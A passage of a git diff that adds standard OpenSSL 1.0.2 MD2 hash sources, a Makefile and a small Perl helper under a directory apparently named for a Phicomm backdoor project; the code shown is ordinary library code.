zxQuXREp4tdq_pm|QhRpTN6L#42TzNq#L9K(C8DQ-3B7YAlOVc>=<gBz1ET+Vdd+>)
zBnH$ERPJP<;rIy<<y9L1dd8|~S*@%g#tH~Vh?HX@+97%?NPB}2NHabNv!=3?7;d7k
z0(yiPF9gLdvUUTFxVFerSA4_I8<_Q#b&o)T=43~IZ#Fs8FWy6MYoH7YKDaVo2K&%M
zSKmTEjLi^IziK>Y*)ZZYMpFQo_Tr&=n&|PG;=la9eTQ)mS+;JY+IYnGy%IohRT)D;
zVmwu9i<qRe;u0}dkuvm=AVAF5k6-Z|>xGm!lflE%j3r{mJ0Q5{uASSt5<+gC(Nl6|
zk$GB&ThQ>3&XjC|N2L`Lz}Sj00>z6UP!&JkGe!&=e5~*fqJK*y29zd*%_>w|*zBFc
zYx>herryPn38;DrL<3t969geCVv7<(rIwb>NzhC;s<sRNetXJj43s)d(pe$nfAx%B
z9tkE5xa$pX2ux@`)ffctYZUV$+|rfn<{wG%hFE!bCfzeyJCw~y{n95@Z*=N@%&vPm
z)2-_NVd}3k^%pz1e)t|x3)Tn0i@klauO~Cq6Yj)J!k{~OFq7BhfgN(oU^bUZsd6+N
z30KS2)$%i$oLn7=!sXr=kFS?Q?b{1EtsvKi*M=i&qE8m+HoB)e5{|5U+=4B=UReAv
z7r|`&T07prV~BZR;#grVf@}A)f@{R@dT3dd_$m}s0`QgW?EARZN&Z9bIw^3_QzywK
zZ@m;cuqYu#_AOSVnqpO>6m$1UH2^452pE771nMLaZFey}-E0lPN-t_W!yBnV@*i+F
zNP&HxCP^-OJxP}oP^h?oyg!49;~9K3A+LhG3FOV4lmdxUz<X8_V{klyJTQLA^d594
zq(BLMKHvq{_My+k#o(?-cTr~*o3kJnfw=-@VLUP88?^_VMQ@`N@jT*^WYEeywBkgV
z41L#n$zOCgO0s*C<X0qd1L*2u=bKP5yu(3^Wyw>IekIT^1^pV9LUw<Ylc&zU^|qjb
z$Pp&Loyi|^*DsU{MT+f`YCxYO6_&Plta|vE>BIbd+CVn1aLb&J$20FA8rBxCu1`vN
zK$CMU0l;n3Lu-vOd1%!-B~U;8l*~Es2;v+J0gr%I<_?drbPnjF2zJZd;Ss9lfY?9F
z!GG>IuklA1{xOrFbq@5SFz1Uo*2sJ~*8F@p*3o?UHo(!Jt@IPYdIqp8!+*hW+8=-o
zz?@Ido(1qjOiwFICG8Qwe#G#7EOfLF0Q)(^uQ8m~KVZLRc#Nfz)-_<iXZTMT&V4%#
z_=C2*<Gnx!zec;WT0SR))p!K%()5s)$LkfzT=sb(-Ke(IDQdc<p&?b@mTpt()cUj#
zfA;IGZ7u2kOkdwXC*SSJXR`u`clHmWG~L45n;XjJHO`dJS~6)cl<C}=?(Er_-jV6;
zLy4|zUslT^l?Ru4v%{3`8UP7;j6^z<@5W88(4X$rvi(E28P4X1dIxgWYb|B{iRpR(
zCj1Z45nwomA7jJu$O8Q97vOKT;SbvM<QcvSu;n(qXw&~08@`{_6Z&J<^MeKO0=pWV
z@3ouZs0aTm`FmYifd8hA-yVmjQ2`8GJ`a=Y`Kb-J`{`zN>GY?H;ZA>sZMa?k)B^aA
z7l?xlzTv=Q#zOZ!^f`<3d*uZO&hM2Y4xIP>1qaUip4Shz%llZh<rmL*ANM(M-p9Xk
z;JlCTJ8<5|LU?Fbzn0k!tCqLc9!}-6eVMS99npkvS4PVS;q601LO4Hw8)T1$qkJob
zI|usvvpHbR4QSag{L-wUEy(uWxk7j_KQIWrx(j4baTc36)1PGl`9BvK<na}qU!WLZ
zIDY3iVBxS1;rS3utf?4G`|x8^!I)wK%Ya5wL=Z;6TIlx!aaR5e6@-r*cKLzR{%SZt
zo&T$R6l76nHB9^9_PM|OjN9jH3=WXC*F5EApVkoF%s%8<l2QboC?9d)AtwK22hQ#C
zbt98^unDQTpLWW^<v4!^2xN8o-@)W%&d640Jaz$&I-T+(OkQ*xIOR2vov(gwN|wQ!
z)*@j2;NK0G=k+t6Z4}wdevytc`&f=Ro$|=$tQ~-a8Z-#wytT|co$<rFcRu+k>&Htd
K&PZB>Q~tk%qaphM

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/num.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/num.pl
new file mode 100644
index 0000000..30fedf9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/num.pl
@@ -0,0 +1,17 @@
+#!/usr/local/bin/perl
+
+#node     10 ->   4
+
+while (<>)
+	{
+	next unless /^node/;
+	chop;
+	@a=split;
+	$num{$a[3]}++;
+	}
+
+@a=sort {$a <=> $b } keys %num;
+foreach (0 .. $a[$#a])
+	{
+	printf "%4d:%4d\n",$_,$num{$_};
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/Makefile
new file mode 100644
index 0000000..17f878a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/Makefile
@@ -0,0 +1,89 @@
+#
+# OpenSSL/crypto/md/Makefile
+#
+
+DIR=	md2
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=md2test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md2_dgst.c md2_one.c
+LIBOBJ=md2_dgst.o md2_one.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= md2.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md2_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md2_dgst.o: ../../include/openssl/md2.h ../../include/openssl/opensslconf.h
+md2_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md2_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md2_dgst.o: ../../include/openssl/symhacks.h md2_dgst.c
+md2_one.o: ../../e_os.h ../../include/openssl/bio.h
+md2_one.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+md2_one.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+md2_one.o: ../../include/openssl/lhash.h ../../include/openssl/md2.h
+md2_one.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+md2_one.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+md2_one.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+md2_one.o: ../cryptlib.h md2_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2.c
new file mode 100644
index 0000000..584e34a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2.c
@@ -0,0 +1,119 @@
+/* crypto/md2/md2.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/md2.h>
+
+#define BUFSIZE 1024*16
+
+void do_fp(FILE *f);
+void pt(unsigned char *md);
+int read(int, void *, unsigned int);
+void exit(int);
+int main(int argc, char *argv[])
+{
+    int i, err = 0;
+    FILE *IN;
+
+    if (argc == 1) {
+        do_fp(stdin);
+    } else {
+        for (i = 1; i < argc; i++) {
+            IN = fopen(argv[i], "r");
+            if (IN == NULL) {
+                perror(argv[i]);
+                err++;
+                continue;
+            }
+            printf("MD2(%s)= ", argv[i]);
+            do_fp(IN);
+            fclose(IN);
+        }
+    }
+    exit(err);
+    return (err);
+}
+
+void do_fp(FILE *f)
+{
+    MD2_CTX c;
+    unsigned char md[MD2_DIGEST_LENGTH];
+    int fd, i;
+    static unsigned char buf[BUFSIZE];
+
+    fd = fileno(f);
+    MD2_Init(&c);
+    for (;;) {
+        i = read(fd, buf, BUFSIZE);
+        if (i <= 0)
+            break;
+        MD2_Update(&c, buf, (unsigned long)i);
+    }
+    MD2_Final(&(md[0]), &c);
+    pt(md);
+}
+
+void pt(unsigned char *md)
+{
+    int i;
+
+    for (i = 0; i < MD2_DIGEST_LENGTH; i++)
+        printf("%02x", md[i]);
+    printf("\n");
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2.h
new file mode 100644
index 0000000..b568d3f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2.h
@@ -0,0 +1,94 @@
+/* crypto/md/md2.h */
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_MD2_H
+# define HEADER_MD2_H
+
+# include <openssl/opensslconf.h>/* OPENSSL_NO_MD2, MD2_INT */
+# ifdef OPENSSL_NO_MD2
+#  error MD2 is disabled.
+# endif
+# include <stddef.h>
+
+# define MD2_DIGEST_LENGTH       16
+# define MD2_BLOCK               16
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct MD2state_st {
+    unsigned int num;
+    unsigned char data[MD2_BLOCK];
+    MD2_INT cksm[MD2_BLOCK];
+    MD2_INT state[MD2_BLOCK];
+} MD2_CTX;
+
+const char *MD2_options(void);
+# ifdef OPENSSL_FIPS
+int private_MD2_Init(MD2_CTX *c);
+# endif
+int MD2_Init(MD2_CTX *c);
+int MD2_Update(MD2_CTX *c, const unsigned char *data, size_t len);
+int MD2_Final(unsigned char *md, MD2_CTX *c);
+unsigned char *MD2(const unsigned char *d, size_t n, unsigned char *md);
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2_dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2_dgst.c
new file mode 100644
index 0000000..9cd79f8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2_dgst.c
@@ -0,0 +1,224 @@
+/* crypto/md2/md2_dgst.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/md2.h>
+#include <openssl/opensslv.h>
+#include <openssl/crypto.h>
+
+const char MD2_version[] = "MD2" OPENSSL_VERSION_PTEXT;
+
+/*
+ * Implemented from RFC1319 The MD2 Message-Digest Algorithm
+ */
+
+#define UCHAR   unsigned char
+
+static void md2_block(MD2_CTX *c, const unsigned char *d);
+/*
+ * The magic S table - I have converted it to hex since it is basically just
+ * a random byte string.
+ */
+static const MD2_INT S[256] = {
+    0x29, 0x2E, 0x43, 0xC9, 0xA2, 0xD8, 0x7C, 0x01,
+    0x3D, 0x36, 0x54, 0xA1, 0xEC, 0xF0, 0x06, 0x13,
+    0x62, 0xA7, 0x05, 0xF3, 0xC0, 0xC7, 0x73, 0x8C,
+    0x98, 0x93, 0x2B, 0xD9, 0xBC, 0x4C, 0x82, 0xCA,
+    0x1E, 0x9B, 0x57, 0x3C, 0xFD, 0xD4, 0xE0, 0x16,
+    0x67, 0x42, 0x6F, 0x18, 0x8A, 0x17, 0xE5, 0x12,
+    0xBE, 0x4E, 0xC4, 0xD6, 0xDA, 0x9E, 0xDE, 0x49,
+    0xA0, 0xFB, 0xF5, 0x8E, 0xBB, 0x2F, 0xEE, 0x7A,
+    0xA9, 0x68, 0x79, 0x91, 0x15, 0xB2, 0x07, 0x3F,
+    0x94, 0xC2, 0x10, 0x89, 0x0B, 0x22, 0x5F, 0x21,
+    0x80, 0x7F, 0x5D, 0x9A, 0x5A, 0x90, 0x32, 0x27,
+    0x35, 0x3E, 0xCC, 0xE7, 0xBF, 0xF7, 0x97, 0x03,
+    0xFF, 0x19, 0x30, 0xB3, 0x48, 0xA5, 0xB5, 0xD1,
+    0xD7, 0x5E, 0x92, 0x2A, 0xAC, 0x56, 0xAA, 0xC6,
+    0x4F, 0xB8, 0x38, 0xD2, 0x96, 0xA4, 0x7D, 0xB6,
+    0x76, 0xFC, 0x6B, 0xE2, 0x9C, 0x74, 0x04, 0xF1,
+    0x45, 0x9D, 0x70, 0x59, 0x64, 0x71, 0x87, 0x20,
+    0x86, 0x5B, 0xCF, 0x65, 0xE6, 0x2D, 0xA8, 0x02,
+    0x1B, 0x60, 0x25, 0xAD, 0xAE, 0xB0, 0xB9, 0xF6,
+    0x1C, 0x46, 0x61, 0x69, 0x34, 0x40, 0x7E, 0x0F,
+    0x55, 0x47, 0xA3, 0x23, 0xDD, 0x51, 0xAF, 0x3A,
+    0xC3, 0x5C, 0xF9, 0xCE, 0xBA, 0xC5, 0xEA, 0x26,
+    0x2C, 0x53, 0x0D, 0x6E, 0x85, 0x28, 0x84, 0x09,
+    0xD3, 0xDF, 0xCD, 0xF4, 0x41, 0x81, 0x4D, 0x52,
+    0x6A, 0xDC, 0x37, 0xC8, 0x6C, 0xC1, 0xAB, 0xFA,
+    0x24, 0xE1, 0x7B, 0x08, 0x0C, 0xBD, 0xB1, 0x4A,
+    0x78, 0x88, 0x95, 0x8B, 0xE3, 0x63, 0xE8, 0x6D,
+    0xE9, 0xCB, 0xD5, 0xFE, 0x3B, 0x00, 0x1D, 0x39,
+    0xF2, 0xEF, 0xB7, 0x0E, 0x66, 0x58, 0xD0, 0xE4,
+    0xA6, 0x77, 0x72, 0xF8, 0xEB, 0x75, 0x4B, 0x0A,
+    0x31, 0x44, 0x50, 0xB4, 0x8F, 0xED, 0x1F, 0x1A,
+    0xDB, 0x99, 0x8D, 0x33, 0x9F, 0x11, 0x83, 0x14,
+};
+
+const char *MD2_options(void)
+{
+    if (sizeof(MD2_INT) == 1)
+        return ("md2(char)");
+    else
+        return ("md2(int)");
+}
+
+fips_md_init(MD2)
+{
+    c->num = 0;
+    memset(c->state, 0, sizeof c->state);
+    memset(c->cksm, 0, sizeof c->cksm);
+    memset(c->data, 0, sizeof c->data);
+    return 1;
+}
+
+int MD2_Update(MD2_CTX *c, const unsigned char *data, size_t len)
+{
+    register UCHAR *p;
+
+    if (len == 0)
+        return 1;
+
+    p = c->data;
+    if (c->num != 0) {
+        if ((c->num + len) >= MD2_BLOCK) {
+            memcpy(&(p[c->num]), data, MD2_BLOCK - c->num);
+            md2_block(c, c->data);
+            data += (MD2_BLOCK - c->num);
+            len -= (MD2_BLOCK - c->num);
+            c->num = 0;
+            /* drop through and do the rest */
+        } else {
+            memcpy(&(p[c->num]), data, len);
+            /* data+=len; */
+            c->num += (int)len;
+            return 1;
+        }
+    }
+    /*
+     * we now can process the input data in blocks of MD2_BLOCK chars and
+     * save the leftovers to c->data.
+     */
+    while (len >= MD2_BLOCK) {
+        md2_block(c, data);
+        data += MD2_BLOCK;
+        len -= MD2_BLOCK;
+    }
+    memcpy(p, data, len);
+    c->num = (int)len;
+    return 1;
+}
+
+static void md2_block(MD2_CTX *c, const unsigned char *d)
+{
+    register MD2_INT t, *sp1, *sp2;
+    register int i, j;
+    MD2_INT state[48];
+
+    sp1 = c->state;
+    sp2 = c->cksm;
+    j = sp2[MD2_BLOCK - 1];
+    for (i = 0; i < 16; i++) {
+        state[i] = sp1[i];
+        state[i + 16] = t = d[i];
+        state[i + 32] = (t ^ sp1[i]);
+        j = sp2[i] ^= S[t ^ j];
+    }
+    t = 0;
+    for (i = 0; i < 18; i++) {
+        for (j = 0; j < 48; j += 8) {
+            t = state[j + 0] ^= S[t];
+            t = state[j + 1] ^= S[t];
+            t = state[j + 2] ^= S[t];
+            t = state[j + 3] ^= S[t];
+            t = state[j + 4] ^= S[t];
+            t = state[j + 5] ^= S[t];
+            t = state[j + 6] ^= S[t];
+            t = state[j + 7] ^= S[t];
+        }
+        t = (t + i) & 0xff;
+    }
+    memcpy(sp1, state, 16 * sizeof(MD2_INT));
+    OPENSSL_cleanse(state, 48 * sizeof(MD2_INT));
+}
+
+int MD2_Final(unsigned char *md, MD2_CTX *c)
+{
+    int i, v;
+    register UCHAR *cp;
+    register MD2_INT *p1, *p2;
+
+    cp = c->data;
+    p1 = c->state;
+    p2 = c->cksm;
+    v = MD2_BLOCK - c->num;
+    for (i = c->num; i < MD2_BLOCK; i++)
+        cp[i] = (UCHAR) v;
+
+    md2_block(c, cp);
+
+    for (i = 0; i < MD2_BLOCK; i++)
+        cp[i] = (UCHAR) p2[i];
+    md2_block(c, cp);
+
+    for (i = 0; i < 16; i++)
+        md[i] = (UCHAR) (p1[i] & 0xff);
+    memset((char *)&c, 0, sizeof(c));
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2_one.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2_one.c
new file mode 100644
index 0000000..cd2631b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2_one.c
@@ -0,0 +1,96 @@
+/* crypto/md2/md2_one.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
